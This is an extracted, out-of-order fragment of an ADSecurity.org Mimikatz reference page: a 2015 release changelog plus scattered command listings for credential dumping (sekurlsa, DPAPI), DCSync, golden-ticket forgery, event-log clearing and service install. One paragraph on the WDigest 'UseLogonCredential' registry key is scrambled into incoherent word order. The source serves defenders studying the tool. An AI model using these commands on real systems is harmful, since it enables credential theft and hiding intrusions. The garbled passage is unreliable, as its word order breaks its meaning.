Mimikatz Release Date: 11/09/2015 mimikatz: updated to build with hid.lib Mimikatz Release Date: 10/08/2015 Kiwi & René Coty BusyLight mode Mimikatz Release Date: 10/04/2015 mimikatz + mimilib sekurlsa fix for SmartCard informations Mimikatz Release Date: 9/29/2015 sekurlsa::kerberos – Fix SmartCard pin code Mimikatz Release Date: 9/26/2015 sekurlsa::pth Auto-impersonation (/impersonate) Mimikatz Release Date: 9/16/2015 lsadump::dcsync fix for with 2012r2 AD Recycle Bin Thank you to @asolino, @mubix & @carnal0wnage ! Mimikatz Release Date: 9/06/2015 Enhancements * Code cleaning Mimikatz Release Date: 9/01/2015 kerberos::golden : fix for groups printing. https://adsecurity.org/?page_id=1821 Page 78 of 79 lsadump::dcsync autoselect a domain controller with Directory Service (DIRECTORY_SERVICE) Mimikatz Release Date: 8/30/2015 Cleaning & few Win10 adaptations Mimikatz Release Date: 8/25/2015 Licence fix on one missed file by AnkhSVN 😉 Global licence update, credits to Vincent LE TOUX for DCSync, and lsadump::hash moved to crypto::hash This page and all content Copyright © 2015-2016 Sean Metcalf (ADSecurity.org). All Rights Reserved. No warranty is implied or provided. (Visited 740,040 times, 29 visits today) Source: https://adsecurity.org/?page_id=1821 https://adsecurity.org/?page_id=1821 Page 79 of 79 This registry Digest password key is worth monitoring support which forces in your environment “clear-text” since passwords to an attacker may wish be placed in LSASS to set it to 1 to on any version enable of Windows from Windows 7/2008R2 up to Windows 10/2012R2. Windows 8.1/2012 R2 and newer do not have a “UseLogonCredential” DWORD value, so it would have to be created. The existence of this key on these systems may indicate a problem. Page 3 of 79 https://adsecurity.org/?page_id=1821 DPAPI::Vault -VAULT test DPAPI::WIFI -WIFI test (XML profile required-reference Ben’s spreadsheet) DPAPI::WWAN -WWAN test (XML profile required -reference Ben’s spreadsheet) EVENT EVENT::Clear -Clear an event log Page 17 of 79 https://adsecurity.org/?page_id=1821 SEKURLSA::Dpapi -list cached MasterKeys SEKURLSA::DpapiSystem -DPAPI_SYSTEM secret SEKURLSA::Ekeys -list Kerberos encryption keys Page 51 of 79 https://adsecurity.org/?page_id=1821 SEKURLSA::Trust -get trust keys (I think this is deprecated in favor of lsadump::trust /patch) SEKURLSA::TSPKG -Lists TsPkg credentials Page 66 of 79 https://adsecurity.org/?page_id=1821 SERVICE SERVICE::+ (plus sign)-Install Mimikatz service (‘mimikatzsvc’) SERVICE::- (minus sign)-Uninstall Mimikatz service (‘mimikatzsvc’) Page 68 of 79